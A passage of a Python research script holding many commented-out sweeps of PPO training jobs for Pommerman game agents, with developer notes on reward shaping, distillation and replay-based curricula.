# # "eval-mode": "ffa-curriculum"
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for gamma in [.99, .995]:
# for distill in [0, 3000]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman8x8nsk-%d" % counter
# if distill:
# j["run-name"] += "-dst"
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### These are homogenous jobs on 8x8.
# job = {
# "num-processes": 30, "how-train": "homogenous", "eval-mode": "homogenous",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeTeam8x8-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall",
# "use-gae": "", "board-size": 8,
# }
# counter = 0
# for learning_rate in [3e-4, 1e-4, 6e-5]:
# for gamma in [.99, .995]:
# j = {k:v for k,v in job.items()}
# run_name = "pmanhom8x8"
# j["run-name"] = run_name + "-%d" % counter
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Homog similar to above but using distill as well.
# job = {
# "num-processes": 30, "how-train": "homogenous", "eval-mode": "homogenous",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeTeam8x8-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall",
# "use-gae": "", "board-size": 8, "distill-expert": "SimpleAgent"
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for gamma in [.995, .999]:
# for distill in [2500, 5000]:
# j = {k:v for k,v in job.items()}
# run_name = "pmanhomdst8x8"
# j["run-name"] = run_name + "-%d" % counter
# j["gamma"] = gamma
# j["lr"] = learning_rate
# j["distill-epochs"] = distill
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### These are being run with a very small dataset of just 4 things.
# job = {
# "how-train": "simple", "log-interval": 1000,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFAEasy-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "state-directory": os.path.join(directory, "ffacompetition4-s100/train")
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for gamma in [.995]:
# for distill in [0, 3000]:
# for (name, distro) in [("uSchA", "uniformScheduleA"),
# ("uAdpt", "uniformAdapt"),
# ("uBnA", "uniformBoundsA"),
# ("uBnB", "uniformBoundsB")]:
# for num_processes in [50]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman4%s-%d" % (name, counter)
# j["num-processes"] = num_processes
# j["state-directory-distribution"] = distro
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### These are redos for the new dataset.
# job = {
# "how-train": "simple", "log-interval": 1000,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "state-directory": os.path.join(directory, "ffacompetition11k-s10000/train")
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for gamma in [.995]:
# for distill in [0, 3000]:
# for (name, distro) in [("uSchA", "uniformScheduleA"),
# ("uAdpt", "uniformAdapt"),
# ("uBnA", "uniformBoundsA"),
# ("uBnB", "uniformBoundsB")]:
# for num_processes in [50]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman11kTr-%s-%d" % (name, counter)
# j["num-processes"] = num_processes
# j["state-directory-distribution"] = distro
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Homog with reward shaping.
# These allll sucked.
# job = {
# "num-processes": 50, "how-train": "homogenous", "eval-mode": "homogenous",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeTeam8x8-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall",
# "use-gae": "", "board-size": 8
# }
# counter = 0
# for learning_rate in [1e-4]:
# for gamma in [.995, 1.]:
# for distill in [0, 3000]:
# for bomb_reward in [0.0, 0.001, 0.01]:
# for step_loss in [0.0, -0.001, -0.01]:
# for begin_selfbombing_epoch in [0, 100, 500]:
# if bomb_reward == 0 and step_loss == 0 and begin_selfbombing_epoch == 0:
# continue
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pmhom8x8"
# if begin_selfbombing_epoch > 0:
# j["run-name"] += "-bsbe%d" % begin_selfbombing_epoch
# j["begin-selfbombing-epoch"] = begin_selfbombing_epoch
# if bomb_reward:
# j["run-name"] += "-br%d" % int(1000*bomb_reward)
# j["bomb-reward"] = bomb_reward
# if step_loss:
# j["run-name"] += "-st%d" % int(-1000*step_loss)
# j["step-loss"] = step_loss
# if distill:
# j["distill-expert"] = "SimpleAgent"
# j["distill-epochs"] = distill
# j["run-name"] = j["run-name"] + "-%d" % counter
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
# What happens if we do homogenous with a large begin_slefbombing_epoch?
# job = {
# "num-processes": 50, "how-train": "homogenous", "eval-mode": "homogenous",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeTeam8x8-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall",
# "use-gae": "", "board-size": 8
# }
# counter = 0
# for learning_rate in [1e-4]:
# for gamma in [.995, 1.]:
# for distill in [0, 3000]:
# for begin_selfbombing_epoch in [10000]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pmhom8x8"
# j["run-name"] += "-bsbe%d" % begin_selfbombing_epoch
# j["begin-selfbombing-epoch"] = begin_selfbombing_epoch
# if distill:
# j["distill-expert"] = "SimpleAgent"
# j["distill-epochs"] = distill
# j["run-name"] = j["run-name"] + "-%d" % counter
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
# ### These are being run with a very small dataset of just 4 things.
# # Testing what happens if we use a large begin_selfbombing_epoch.
# # They had the same effect as before, namely that nothiung interesting happened
# # after the selfbombing was allowed again.
# job = {
# "how-train": "simple", "log-interval": 1000,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0",
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "state-directory": os.path.join(directory, "ffacompetition4-s100/train"),
# "num-processes": 50,
# }
# counter = 0
# for learning_rate in [1e-4]:
# for gamma in [.995, 1]:
# for distill in [0, 3000]:
# for (name, distro) in [
# ("uAdpt", "uniformAdapt"),
# ("uSchA", "uniformScheduleB"),
# ]:
# for begin_selfbombing_epoch in [6000]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman4%s-lgbsbe%d-%d" % (
# name, begin_selfbombing_epoch, counter)
# j["begin-selfbombing-epoch"] = begin_selfbombing_epoch
# j["state-directory-distribution"] = distro
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### These are doing 8x8 simple ffa with the begin_selfbombing_epoch.
# job = {
# "num-processes": 50, "how-train": "simple",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFA8x8-v0", "board-size": 8,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# # "eval-mode": "ffa-curriculum"
# }
# counter = 0
# for learning_rate in [1e-4]:
# for gamma in [.995, 1.]:
# for distill in [0, 3000]:
# for begin_selfbombing_epoch in [1000, 10000]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman8x8nsk-lgbsbe%d-%d" % (
# begin_selfbombing_epoch, counter)
# j["begin-selfbombing-epoch"] = begin_selfbombing_epoch
# if distill:
# j["run-name"] += "-dst"
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Homog but this time against the simple agent as the starting challenger.
# TODO: THESE DIDNT START ... WHy not??
# job = {
# "num-processes": 30, "how-train": "homogenous", "eval-mode": "homogenous",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeTeam8x8-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall",
# "use-gae": "", "board-size": 8,
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for gamma in [.995, .999]:
# for distill in [0, 2500, 5000]:
# run_name = "pmanhom8smpst"
# j = {k:v for k,v in job.items()}
# if distill:
# j["distill-expert"] = "SimpleAgent"
# j["distill-epochs"] = distill
# run_name += "dst"
# j["run-name"] = run_name + "-%d" % counter
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
# TODO
### These are attempting to do reward shaping. We are using the small dataset
### because then we'll get results faster.
### Yeah these didn't work. They achieeved full success, but it wasn't sufficient
### to get the agents to learn another approach other than "don't bomb."
#### WAIT< BUT NONE OF THESE USED STEP LSOS OR BOMB REWARD DUMBASS
# job = {
# "how-train": "simple", "log-interval": 1000,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "state-directory": os.path.join(directory, "ffacompetition4-s100/train"),
# "num-processes": 50,
# }
# counter = 0
# for learning_rate in [1e-4]:
# for gamma in [.995]:
# for distill in [0, 3000]:
# for (name, distro) in [
# ("uAdpt", "uniformAdapt"),
# ("uBnA", "uniformBoundsA")
# ]:
# for bomb_reward in [0.0, 0.05, 0.1]:
# for step_loss in [0.0, -0.05, -0.1]:
# if bomb_reward == 0.0 and step_loss == 0.0:
# continue
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman4"
# if bomb_reward:
# j["run-name"] += "br%d" % int(100*bomb_reward)
# if step_loss:
# j["run-name"] += "st%d" % int(100*step_loss)
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["run-name"] += "-dst"
# j["state-directory-distribution"] = distro
# j["run-name"] += "-%s-%d" % (name, counter)
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
# # These are the same as above but with 8x8.
# job = {
# "num-processes": 50, "how-train": "simple",
# "log-interval": 1000,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFA8x8-v0", "board-size": 8,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# # "eval-mode": "ffa-curriculum"
# }
# counter = 0
# for learning_rate in [1e-4]:
# for gamma in [.995]:
# for distill in [0, 3000]:
# for bomb_reward in [0.0, 0.05, 0.1]:
# for step_loss in [0.0, -0.05, -0.1]:
# if bomb_reward == 0.0 and step_loss == 0.0:
# continue
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman8x8"
# if bomb_reward:
# j["run-name"] += "br%d" % int(100*bomb_reward)
# if step_loss:
# j["run-name"] += "st%d" % int(100*step_loss)
# j["state-directory-distribution"] = distro
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["run-name"] += "-dst"
# j["run-name"] += "-%s-%d" % (name, counter)
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### These are repeating teh 8x8 test but with complex agents because they don't
### kill themsevles.
# job = {
# "num-processes": 25, "how-train": "simple",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFA8x8-v0", "board-size": 8,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for gamma in [.99, .995, 1.]:
# for distill in [0, 2500, 5000]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pmancmplx8x8-%d" % counter
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "ComplexAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### These are being run with a very small dataset of just 4 things and with ComplexAgent.
# job = {
# "how-train": "simple", "log-interval": 1000,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "state-directory": os.path.join(directory, "ffacompetition4-s100-complex/train")
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for gamma in [.995, 1.]:
# for distill in [0, 2500, 5000]:
# for (name, distro) in [("uSchA", "uniformScheduleA"),
# ("uAdpt", "uniformAdapt"),
# ("uBnA", "uniformBoundsA")]:
# for num_processes in [50]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman4cmplx%s-%d" % (name, counter)
# j["num-processes"] = num_processes
# j["state-directory-distribution"] = distro
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "ComplexAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### These mostly worked, however they didnt end up getting to where we wanted wrt
### going further back in time because they hit some odd bugs.
### A note is that while the reduced schedules did not seem to work for 100, they did
### seem to work for 4.
# job = {
# "how-train": "simple", "log-interval": 1000,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 50, "gamma": 1.0,
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5, 3e-5]:
# for (name, distro) in [
# ("uSchB", "uniformScheduleB"),
# ("uSchC", "uniformScheduleC"),
# ("uSchD", "uniformScheduleD"),
# ("uSchE", "uniformScheduleE"),
# ("uSchF", "uniformScheduleF"),
# ("uSchG", "uniformScheduleG"),
# ("uBnD", "uniformBoundsD"),
# ("uBnE", "uniformBoundsE"),
# ("uBnA", "uniformBoundsA")
# ]:
# for numgames in [100, 4]:
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex/train" % numgames)
# j["run-name"] = "pman%dcmplx2%s-%d" % (numgames, name, counter)
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Similar to the above, but for 4. To be honest, this is basically the experiemnt right here.
### We are asking: Can we learn better from the back than from the front?
# These are still going. They are doing well but we want to go faster and hone in on the backend.
# saved_paths = {
# "cmplxagn-4-uBnB-4": "agent0-cmplxagn-4-uBnB-4.simple.FFACompetition-v0.Small.nc256.lr0.0001.bs5120.ns103.gam1.0.seed1.gae.uniformBoundsBepoch4750.steps24462500.pt",
# "cmplxagn-4-uBnB-15": "agent0-cmplxagn-4-uBnB-15.simple.FFACompetition-v0.Small.nc256.lr6e-05.bs5120.ns103.gam1.0.seed1.gae.uniformBoundsBepoch4500.steps23175000.pt",
# }
# job = {
# "how-train": "simple", "log-interval": 2500, "save-interval": 250,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 50, "gamma": 1.0,
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5, 3e-5]:
# for (name, distro) in [
# ("uSchC", "uniformScheduleC"), #500
# ("uSchB", "uniformScheduleB"), #1000
# ("uSchF", "uniformScheduleF"), #2000
# ("uBnF", "uniformBoundsF"), #500
# ("uBnB", "uniformBoundsB"), #1000
# ("uBnE", "uniformBoundsE"), #2000
# ("genesis", "genesis"),
# ("uFwdA", "uniformForwardA"), #250
# ("uFwdB", "uniformForwardB"), #500
# ("uFwdC", "uniformForwardC"), #1000
# ("uAll", "uniform"), #all random.
# # ("ubtst", "uniformBoundsBTst"),
# ]:
# for numgames in [4]:
# if counter not in [4, 15]:
# counter += 1
# continue
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex/train" % numgames)
# j["run-name"] = "cmplxagn-%d-%s-%d" % (numgames, name, counter)
# path = saved_paths.get(j["run-name"])
# if not path:
# counter += 1
# continue
# else:
# j["saved-paths"] = "/checkpoint/cinjon/selfplayground/models/%s" % path
# print("DOING SAVED PATH: ", j["saved-paths"])
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### LSTM runs with distribution: 16
# job = {
# "num-processes": 50, "how-train": "simple",
# "log-interval": 2500, "save-interval": 250,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "gamma": "1.0", "use-gae": "",
# "model-str": "PommeCNNPolicySmall",
# "recurrent-policy": "", "eval-mode": "ffa", "num-stack": 1,
# "config": "PommeFFACompetition-v0"
# }
# counter = 0
# for learning_rate in [1e-4, 3e-5]:
# for (name, distro) in [
# ("exdistr", None),
# ("genesis", "genesis"), # always starts at step 0 from replays.
# ("uSchC", "uniformScheduleC"), #500
# ("uSchB", "uniformScheduleB"), #1000
# ("uSchF", "uniformScheduleF"), #2000
# ("uBnF", "uniformBoundsF"), #500
# ("uBnB", "uniformBoundsB"), #1000
# ("uBnE", "uniformBoundsE"), #2000
# ]:
# if distro:
# j["state-directory"] = os.path.join(directory, "ffacompetition4-s100-complex/train")
# j["state-directory-distribution"] = distro
# j = {k:v for k,v in job.items()}
# j["run-name"] = "lstm-%s-pman%d" % (name, counter)
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
# ### LSTM with 8x8: 2
# job = {
# "num-processes": 50, "how-train": "simple",
# "log-interval": 2500, "save-interval": 250,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "gamma": "1.0", "use-gae": "",
# "model-str": "PommeCNNPolicySmall",
# "recurrent-policy": "", "eval-mode": "ffa", "num-stack": 1,
# "config": "PommeFFA8x8-v0", "board-size": 8,
# }
# counter = 0
# for learning_rate in [1e-4, 3e-5]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "lstm8x8-pman%d" % (counter)
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Doing the above (non-lstm jobs) but having honed in on the backend more.
# job = {
# "how-train": "simple", "log-interval": 2500, "save-interval": 250,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 50, "gamma": 1.0,
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5, 3e-5]:
# for (name, distro) in [
# ("setBnA", "setBoundsA"),
# ("setBnB", "setBoundsB"),
# ]:
# for numgames in [4]:
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex/train" % numgames)
# j["run-name"] = "cmplxfstr-%d-%s-%d" % (numgames, name, counter)
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
# saved_paths = {
# "cmplxfstr-4-setBnC-4": "agent0-cmplxfstr-4-setBnC-4.simple.FFACompetition-v0.Small.nc256.lr3e-05.bs5120.ns103.gam1.0.seed1.gae.setBoundsCepoch1250.steps6437500.pt",
# "cmplxfstr-4-setBnC-2": "agent0-cmplxfstr-4-setBnC-2.simple.FFACompetition-v0.Small.nc256.lr6e-05.bs5120.ns103.gam1.0.seed1.gae.setBoundsCepoch1250.steps6437500.pt",
# "cmplxfstr-4-setBnD-1": "agent0-cmplxfstr-4-setBnD-1.simple.FFACompetition-v0.Small.nc256.lr0.0001.bs5120.ns103.gam1.0.seed1.gae.setBoundsDepoch1250.steps6437500.pt",
# "cmplxfstr-4-setBnF-3": "agent0-cmplxfstr-4-setBnF-3.simple.FFACompetition-v0.Small.nc256.lr6e-05.bs5120.ns103.gam1.0.seed1.gae.setBoundsFepoch1250.steps6437500.pt",
# "cmplxfstr-4-setBnE-4": "agent0-cmplxfstr-4-setBnE-4.simple.FFACompetition-v0.Small.nc256.lr3e-05.bs5120.ns103.gam1.0.seed1.gae.setBoundsEepoch1250.steps6437500.pt",
# "cmplxfstr-4-setBnD-5": "agent0-cmplxfstr-4-setBnD-5.simple.FFACompetition-v0.Small.nc256.lr3e-05.bs5120.ns103.gam1.0.seed1.gae.setBoundsDepoch1250.steps6437500.pt",
# "cmplxfstr-4-setBnE-0": "agent0-cmplxfstr-4-setBnE-0.simple.FFACompetition-v0.Small.nc256.lr0.0001.bs5120.ns103.gam1.0.seed1.gae.setBoundsEepoch1250.steps6437500.pt",
# "cmplxfstr-4-setBnF-1": "agent0-cmplxfstr-4-setBnF-1.simple.FFACompetition-v0.Small.nc256.lr0.0001.bs5120.ns103.gam1.0.seed1.gae.setBoundsFepoch1250.steps6437500.pt",
# }
# job = {
# "how-train": "simple", "log-interval": 2500, "save-interval": 250,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 50, "gamma": 1.0,
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5, 3e-5]:
# for (name, distro) in [
# ("setBnC", "setBoundsC"),
# ("setBnD", "setBoundsD"),
# ]:
# for numgames in [4]:
# if counter not in [1, 2, 4, 5]:
# counter += 1
# continue
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex/train" % numgames)
# j["run-name"] = "cmplxfstr-%d-%s-%d" % (numgames, name, counter)
# path = saved_paths.get(j["run-name"])
# if not path:
# counter += 1
# continue
# else:
# j["saved-paths"] = "/checkpoint/cinjon/selfplayground/models/%s" % path
# print("DOING SAVED PATH: ", j["saved-paths"])
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
# job = {
# "how-train": "simple", "log-interval": 2500, "save-interval": 250,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 50, "gamma": 1.0,
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5, 3e-5]:
# for (name, distro) in [
# # ("setBnC", "setBoundsC"),
# # ("setBnD", "setBoundsD"),
# ("setBnE", "setBoundsE"),
# ("setBnF", "setBoundsF"),
# ]:
# for numgames in [4]:
# if counter not in [0, 1, 3, 4]:
# counter += 1
# continue
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex/train" % numgames)
# j["run-name"] = "cmplxfstr-%d-%s-%d" % (numgames, name, counter)
# path = saved_paths.get(j["run-name"])
# if not path:
# counter += 1
# continue
# else:
# j["saved-paths"] = "/checkpoint/cinjon/selfplayground/models/%s" % path
# print("DOING SAVED PATH: ", j["saved-paths"])
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Test adding an item reward in.
# job = {
# "how-train": "simple", "log-interval": 2500, "save-interval": 250,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 50, "gamma": 1.0,
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for (name, distro) in [
# ("setBnF", "setBoundsF"),
# ("setBnD", "setBoundsD"),
# ("uBnF", "uniformBoundsF"), #500
# ("uBnB", "uniformBoundsB"), #1000
# ]:
# for numgames in [4, 100]:
# for itemreward in [0, .03, .1]:
# if itemreward == 0 and numgames == 4:
# continue
# if counter not in [0, 36, 30, 10, 25]:
# counter += 1
# continue
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex/train" % numgames)
# j["run-name"] = "cmplxitm%d-%s-%d" % (numgames, name, counter)
# if itemreward:
# j["item-reward"] = itemreward
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Same as aobve but including some other runs.
# job = {
# "how-train": "simple", "log-interval": 2500, "save-interval": 250,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 50, "gamma": 1.0,
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for (name, distro) in [
# ("setBnF", "setBoundsF"),
# ("setBnD", "setBoundsD"),
# ("uBnF", "uniformBoundsF"), #500
# ("uBnB", "uniformBoundsB"), #1000
# ]:
# for numgames in [4]:
# for itemreward in [.01, 0]:
# if counter not in [4, 14, 5, 12, 8, 1, 3, 0, 2]:
# counter += 1
# continue
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex/train" % numgames)
# j["run-name"] = "cmplxitm2-%d-%s-%d" % (numgames, name, counter)
# if itemreward:
# j["item-reward"] = itemreward
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Uninterrupted version of the above :/.
# job = {
# "how-train": "simple", "log-interval": 2500, "save-interval": 250,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 50, "gamma": 1.0,
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for (name, distro) in [
# ("setBnF", "setBoundsF"),
# ("setBnD", "setBoundsD"),
# ("uBnF", "uniformBoundsF"), #500
# ("uBnB", "uniformBoundsB"), #1000
# ]:
# for numgames in [4]:
# for itemreward in [0, .01, .03, .1]:
# for seed in [2, 3]:
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex/train" % numgames)
# j["run-name"] = "unint-cmplxitm%d-%s-%d" % (numgames, name, counter)
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### With the dumb batch size fix.
# NOTE: This is the SMALL BATCH SIZE / WARM START VERSION!!!
# job = {
# "how-train": "simple", "log-interval": 2500, "save-interval": 500,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 50, "gamma": 1.0,
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for (name, distro) in [
# ("setBnF", "setBoundsF"),
# ("setBnD", "setBoundsD"),
# ("uBnF", "uniformBoundsF"), #500
# ("uBnB", "uniformBoundsB"), #1000
# ]:
# for numgames in [4]:
# for itemreward in [0, .03, .1]:
# for seed in [2]:
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex/train" % numgames)
# j["run-name"] = "untbsfx-%s-%d" % (name, counter)
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### These were promising but take hella long to run, so we want to expedite them and save them more frequently..
### NOTE: THIS IS THE BIG BATCH SIZE / WARM START
# job = {
# "how-train": "simple", "log-interval": 2500, "save-interval": 25,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000,
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for (name, distro) in [
# ("setBnF", "setBoundsF"),
# ("setBnD", "setBoundsD"),
# ("uBnF", "uniformBoundsF"), #500
# ("uBnB", "uniformBoundsB"), #1000
# ("genesis", "genesis"),
# ]:
# for numgames in [4]:
# for itemreward in [0, .1]:
# for seed in [1]:
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex/train" % numgames)
# j["run-name"] = "bsfx-%s-%d" % (name, counter)
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### This is the main comparison between genesis and uBn.
# job = {
# "how-train": "simple", "log-interval": 2500, "save-interval": 25,
# "log-dir": os.path.join(directory, "logs-bsfx"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
